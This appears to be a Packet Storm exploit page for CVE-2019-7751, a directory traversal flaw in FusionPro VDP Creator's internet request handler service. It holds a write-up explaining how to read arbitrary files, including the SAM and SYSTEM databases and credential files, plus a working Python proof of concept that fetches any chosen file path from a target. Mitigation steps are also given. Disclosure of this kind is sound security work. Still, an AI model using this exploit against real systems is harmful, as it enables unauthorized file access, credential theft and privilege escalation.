what you don't know can hurt you

MarcomCentral FusionPro VDP Creator Directory Traversal

MarcomCentral FusionPro VDP Creator Directory Traversal
Posted Mar 5, 2019
Authored by 0v3rride

MarcomCentral FusionPro VDP Creator versions prior to 10.0 suffer from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2019-7751
MD5 | 06756d818f5cc3711574cae6adb8815a

MarcomCentral FusionPro VDP Creator Directory Traversal

Change Mirror Download
#!/usr/bin/env python

'''
# Exploit Title: MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal
# Date: 02/11/2019
# Exploit Author: 0v3rride
# Vendor Homepage: https://marcom.com/
# Software Link: http://static.pti.com/downloads/FusionPro/Win32/FusionPro_9.3.36_Setup.exe
# Version: < 10.0 (version tested was 9.3)
# Executable/Service: FPProducerInternetServer.exe v9.03.0036.0000 (FusionPro Internet Request Handler)
# Tested on: Windows
# CVE : 2019-7751

Summary
A directory traversal and local file inclusion vulnerability in the FPProducerInternetServer.exe service/utility in Ricoh MarcomCentral's, formerly PTI Marketing, FusionPro VDP Creator allows a remote attacker to list or enumerate sensitive contents of files. Furthermore, this could allow for privilege escalation by dumping the local machine's SAM and SYSTEM database files, access to common files that contain plaintext credentials, and possibly remote code execution.

Attack Details
Exploiting this vulnerability is extremely simple. This could be done from a browser like Firefox. Simply navigate the affected host (e.g. <http://><host.domain.tld>:<port#>/Windows/System32/drivers/etc/hosts. No slash-dot-dots (/../..) are required, but you can add some if you want. Note that the slashes are forward slashes! By default, the service sets up a listener on port 8080.

Vendor Response
The response I've received from the vendor suggests that they care very little about the issue despite the criticality of this class of vulnerability. I'll quote the vendors response, "just delete it". Delete what exactly? Uninstall FusionPro VDP Creator? Or should one just delete FPProducerInternetServer.exe? The vendor also wasn't clear if any of the more current versions (10.0 and 10.1) are affected. All that was sent was, "since v9.3 there have been changes to this utility to restrict access to folders". It is possible that these versions are also susceptible to the issue as well based on the response from the vendor.

Resolution
Thankfully I found some better solutions other than "just delete it".

Open services.msc
Look for the service named FusionPro Internet Request Handler
Right-click and open the properties Window
Stop the service if it's running
Select disabled startup type

Or you could write a PowerShell script that does it automatically for you using the set-service and get-service cmdlets.

The nuclear option would be deleting the following executable, C:\Windows\SysWOW64\FPProducerInternetServer.exe. However, I don't know what affect this will have on the machine and FusionPro VDP Creator software. You could take a gamble and upgrade to the latest version .
'''

#######################
# PoC by: 0v3rride #
# DoC: February 2019 #
#######################

from requests import *
from sys import *;


def travel(fullurl):
r = get(fullurl);
print("-" * 80 + "\n[i]: Supplied URL: {}".format(fullurl))
print("-" * 80 + "\n[i]: Response Status Code: {}".format(r.status_code));
print("-" * 80 + "\n[i]: Response Headers:\n");

for hdr in r.headers:
print("{}: {}".format(hdr, r.headers[hdr]));

print("-" * 80 + "\n[i]: RAW DATA RETURNED FROM RESPONSE: \n{}".format(r.text));


if len(argv) < 3:
print("[i]: Usage -- ./poc <http(s)://FQDN or http(s)://<IP address>:<Port #> <file to query on the local machine that is affected (e.g. /windows/system32/drivers/etc/hosts)");
print("[i]: Path needs to start with a '/'.");
else:
try:
print("[i]: https://github.com/0v3rride/");
print("-" * 80 + "\n[!] Sending the request...");
travel(argv[1] + argv[2]);
except RequestException as re:
print(re.strerror);
finally:
print("-" * 80 + "\n[!] Done!");

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close